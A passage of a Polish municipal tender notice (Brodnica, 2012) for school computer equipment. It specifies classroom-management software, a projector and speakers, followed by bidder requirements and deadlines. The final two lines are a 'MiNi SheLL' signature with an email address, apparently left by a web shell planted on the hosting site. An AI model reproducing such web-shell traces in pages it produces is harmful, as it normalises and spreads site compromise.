	definiowanie klasy wraz z ustawieniami lokalnymi oraz nazwami przedmiotu
	możliwość oceniania wyników testów w obrębie zdefiniowanej klasy
	zintegrowane zarządzanie testami w obrębie aplikacji nauczyciela: 
	definicja pytań: otwarte, wielokrotnego wyboru, jednokrotnego wyboru, z lukami,
	możliwość definiowania skali ocen
	możliwość udostępniania tworzonych pytań dla innych profili nauczycieli
	import/export, zestawów pytań do/z innych aplikacji nauczyciela
	możliwość tworzenia pytań i zestawów testów przez firmy trzecie dzięki otwartemu systemowi kodowania danych dla pytań i testów
	możliwość sterowania przepływem danych podczas przeprowadzania testów: wstrzymanie testu, postęp odpowiedzi u uczniów
Praca na lekcji
	automatyczne wykrywanie uczniów w sieci,
	możliwość blokowania ekranu, klawiatury i myszy komputerów wszystkich  lub wybranych uczniów w klasie (tryb Cisza)
	automatyczne dołączanie uprzednio zarejestrowanych uczniów do klasy,
	widoki uczniów: lista uczniów wraz ze stanami logowania, Imieniem, Nazwiskiem, adresem IP, adresem mac, nazwą komputera, loginem ucznia w systemie OS
	widoki uczniów: widok ławek - odwzorowanie fizycznego ustawienia ławek w klasie
	widoki uczniów: dynamiczny podgląd ucznia lub wielu uczniów, dynamiczne skalowanie ilości podglądanych ekranów
	czat klasowy z możliwością. rozmowy pomiędzy wybranymi uczniami, blokowanie czatu dla uczniów
	prezentacja ekranu nauczyciela w trybie full screen i window mode
	możliwość przekazania ekranu wybranego ucznia do wszystkich lub wybranych uczniów (tryb prezentacji ucznia)
	możliwość tworzenia grup uczniów do pracy grupowej
	wysyłanie wiadomości tekstowych do klasy lub wybranych uczniów
	zdalna kontrola komputera ucznia
	zdalne zamykanie komputerów ucznia
	możliwość sprawdzenia przez ucznia popełnionych błędów.
	zapisywanie ekranu nauczyciela w formie wideo do późniejszego odtwarzania na lekcji
	zdalne uruchomienie definiowanych przez nauczyciela programów na wszystkich lub wybranych komputerach uczniowskich. Możliwość podania parametru dla uruchamianej aplikacji. (Np. adres strony www dla przeglądarki)
	możliwość przeprowadzania szybkiego sprawdzianu lub głosowania.
	dostosowanie parametrów przesyłania danych w trybie Prezentacji w zależności od wybranego typu sieci komputerowej
Oprogramowanie komputera ucznia
Musi współpracować z oprogramowaniem komputera nauczyciela.  Posiada poniższą funkcjonalność
	automatyczna rejestracja komputera ucznia w klasie,
	umożliwia podgląd pulpitów komputerów uczniowskich na komputerze nauczyciela
	umożliwia odbieranie ekranu komputera nauczyciela
	przekazywanie ekranu wybranego ucznia na inne stacje uczniowskie inicjowane przez oprogramowanie nauczycielskie
	przesyłanie plików do komputera nauczycielskiego
	odbieranie plików z komputera nauczycielskiego
	umożliwia blokowanie ekranów uczniowskich (silent mode) przez oprogramowanie nauczycielskie
	umożliwia przejecie kontroli nad komputerem uczniowskim przez oprogramowanie nauczycielskie
	umożliwia ponowne uruchomienie, wyłączenie komputera uczniowskiego 
	umożliwia zdalne zamkniecie wszystkich aplikacji użytkowych na komputerze ucznia,
	przeprowadzanie testów przekazywanych z aplikacji nauczycielskiej,
	komunikacja z klasą i nauczycielem w formie czatu, wysłanie bezpośredniej wiadomości tekstowej do nauczyciela,
	zabezpieczenie przed odinstalowaniem oprogramowania,
	umożliwia zdalne uruchomienie aplikacji na komputerach uczniowskich, nauczyciela
	może uruchamiać jednocześnie tą samą aplikację na komputerach wszystkich uczniów,
	umożliwia poprzez oprogramowanie nauczycielskie dzielenie uczniów na grupy i wybieranie lidera w każdej z nich. Podczas lekcji oprogramowanie pozwala prowadzić rozmowy i zajęcia w poszczególnych grupach,
	umożliwia bieżące monitorowanie stanu zasilania oraz stanu procentowego pracy baterii na komputerach uczniowskich przez oprogramowanie nauczycielskie,
	za pośrednictwem komputera nauczyciela, możliwość podglądu adresu IP, adresu MAC, nazwy logowania użytkownika w systemie na komputerach uczniowskich,
	umożliwia monitorowanie z jakiej aplikacji użytkowej, aktualnie korzysta dany uczeń,
	możliwość odtwarzania filmu przekazywanego przez oprogramowanie nauczycielskie, bez konieczności kopiowania, odbieranie obrazu z kamery komputera nauczyciela,
	umożliwia zdalne ustawienia komputerów uczniowskich przez oprogramowanie nauczycielskie:
	zdalne ustawianie kompozycji ekranu w komputerze ucznia,
	zdalne ustawianie parametrów internetowych w komputerze ucznia,
	zdalne ustawianie parametrów pulpitu w komputerze ucznia,
	zdalne ustawianie wygaszacza ekranu w komputerze ucznia,
	zdalne ustawianie schematów zasilania w komputerze ucznia,
11	projektor krótkoogniskowy	3		Technologia 3xLCD
	Jasność min. 2000 ANSI lumenów w trybie pełnej jasności
	Kontrast min. 500:1
	Rozdzielczość rzeczywista min. 1024x768, format matrycy 4:3
	Projektor musi umożliwić wyświetlenie obrazu wykorzystującego całą powierzchnię zaproponowanej tablicy interaktywnej z odległości nie większej niż 122 cm (odległość od tablicy do najbardziej oddalonego elementu projektora) przy zachowaniu proporcji obrazu, jego formatu a także zapewniając ostrość obrazu na całej powierzchni
	Żywotność lampy min. 3000 godzin w trybie pełnej jasności
	Porty wejścia min.: 2xVGA (DB-15), 1xcomposite video (RCA Chinch), 1xS-video, 1xaudio stereo mini Jack 1xaudio stereo 2RCA 1xRS232
	Porty wyjścia min:: 1xVGA (DB-15), 1xaudio stereo 2RCA
	Waga (max) 3,5 kg
	Głośność pracy (max) 36dB w trybie pełnej jasności
	Głośnik wbudowany min. 1 x 1W
	Zabezpieczenie antykradzieżowe kodem PIN
	Uchwyt mocujący do ściany o parametrach: wymiary elementu mocującego do ściany min 150x250 mm waga maksymalnie 6 kg regulacje: odległość od ściany do 150 cm; pochylenie projektora przód/tył; pochylenie na prawo/lewo; odchylenie od ściany prawo/lewo konstrukcja pozwalająca na ukrycie kabli tak aby były prowadzone wewnątrz uchwytu
	Możliwość przypisywania wybranych wejść audio do wybranych wejść wizyjnych
	Zewnętrzny filtr powietrza, który użytkownik sam może wymienić i wyczyścić bez konieczności demontażu projektora i użycia narzędzi
	Wymiana lampy bez konieczności demontażu projektora
	Korekcja efektu trapezowego w pionie
	Co najmniej 2 uchwyty do montażu mechanicznych zabezpieczeń przeciw kradzieżowych - przygotowane przez producenta projektora
	Funkcja blokady klawiatury uniemożliwiająca uczniom samodzielne włączenie i obsługę projektora bez nadzoru nauczyciela
	Czujnik zmiany położenia połączony z zabezpieczeniem przeciw kradzieżowym
	Przyłącze sygnałowe z okablowaniem 
Wszystkie gniazda w jednej zintegrowanej obudowie (nierozłączne) 
Gniazda podłączeniowe: 1 x VGA z Audio; 1 x 3RCA (Composite video z audio); 1 x USB 
Wyjścia sygnałowe: 1 x PC z audio; 1 x video (Composite z audio); 1 x USB Puszka natynkowa
	Okablowanie sygnałowe pomiędzy przyłączem sygnałowym a projektorem, głośnikami i tablicą interaktywną : 1 x PC; 1 x video; 1 x audio; 1 x USB
	gwarancja na projektor na okres nie krótszy niż 3 lata
	gwarancja na lampę na okres nie krótszy niż 3 lata
12	głośniki	5	 zestaw dwudrożnych kolumn stereofonicznych do zastosowania z tablicami interaktywnymi 
 moc wyjściowa RMS: 20W (2x10W)
 pasmo przenoszenia: 80 - 18000Hz
 porty wejściowe przynajmniej:
 1 x USB typ B
 3 x USB typ A
 2 x RCA
 HUB USB 2.0 (minimum dwa wejścia)
 stalowa siatka ochronna głośników uniemożliwiająca manipulowanie przy membranach
 przystosowane do instalacji na ścianie (uchwyty rekomendowane przez producenta.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.20.00-4, 39.16.00.00-1, 39.16.20.00-5, 32.34.00.00-8, 32.34.24.12-3, 32.41.00.00-0, 32.41.30.00-1, 32.41.31.00-2, 32.41.80.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Doświadczenie zawodowe - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, co najmniej jednej (1) dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wykonawca musi wykazać, że wykonał lub wykonuje, co najmniej jedno (1) zadanie o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj., w zakresie dostawy sprzętu komputerowego, przy czym wartość tego pojedynczego zamówienia winna wynosić, co najmniej 100.000,00 PLN brutto. Należy podać ich wartość, przedmiot oraz daty wykonania i odbiorców oraz załączyć dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie - wg załącznika Nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia - wartość ubezpieczenia powinna wynosić, co najmniej 100.000,00 PLN brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - wg załącznika Nr 1 do SIWZ.
	Oświadczenie w trybie art. 22 ust.1 od pkt 1 do pkt 4, art. 24 ust. 1 pkt 1-11 oraz art. 24 ust. 2 na podstawie ustawy z dnia 29 stycznia 2004r z poźn. zmianami - Prawo zamówień publicznych - wg załącznika Nr 2 do SIWZ.
	Oświadczenie o akceptowaniu warunków określonych w SIWZ i nie zgłaszaniu zastrzeżeń, co do przedmiotu zamówienia - wg załącznika Nr 3 do SIWZ.
	Informacje ogólne o wykonawcy - wg załącznika Nr 4 do SIWZ.
	Zaparafowany projekt umowy - wg załącznika Nr 5 do SIWZ. 
	Oświadczenie, iż przedmiot zamówienia jest fabrycznie nowy oraz posiada wymagane prawem normy, deklaracje oraz certyfikaty - wg załącznika Nr 6 do SIWZ.
 	W przypadku ofert równoważnych i dla porównania z opisem przedmiotu zamówienia zawartym w SIWZ zaoferowanego sprzętu w złożonej ofercie - należy dołączyć deklaracje, certyfikaty, specyfikację techniczną oraz informacje o produkcie w formie opisu lub ulotki w języku polskim, zawierające wszystkie dane potwierdzające, że przedmiot zamówienia spełnia wymogi określone w SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość zmiany zawartej umowy w stosunku do treści oferty na mocy art. 144 ust. 1 ustawy - Prawo zamówień publicznych. 
Zamawiający określa następujące warunki, w jakich dopuszcza możliwość dokonania zmian niniejszej umowy:
1.)	konieczności zmiany umownego terminu realizacji zamówienia z powodu:
a)	działania siły wyższej, przez którą rozumieć należy zdarzenie zewnętrzne o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, którego nie można uniknąć, ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie. Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia,
b)	zaistnienia okoliczności leżących po stronie zamawiającego, w szczególności spowodowanych problemami z jego zdolnością płatniczą lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,
2.)	z powodu zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
3.)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez zamawiającego lub wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego;
4.)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie. 
       Każdorazowa zmiana umowy będzie potwierdzona pisemnie, czyli stosownym aneksem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.brodnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brodnicy, ul. Kamionka 23, 87-300 Brodnica w pokoju 207.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2012 godzina 10:00, miejsce: Urząd Miejski w Brodnicy, ul. Kamionka 23, 87-300 Brodnica w pokoju 211 lub drogą pocztową na adres siedziby zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com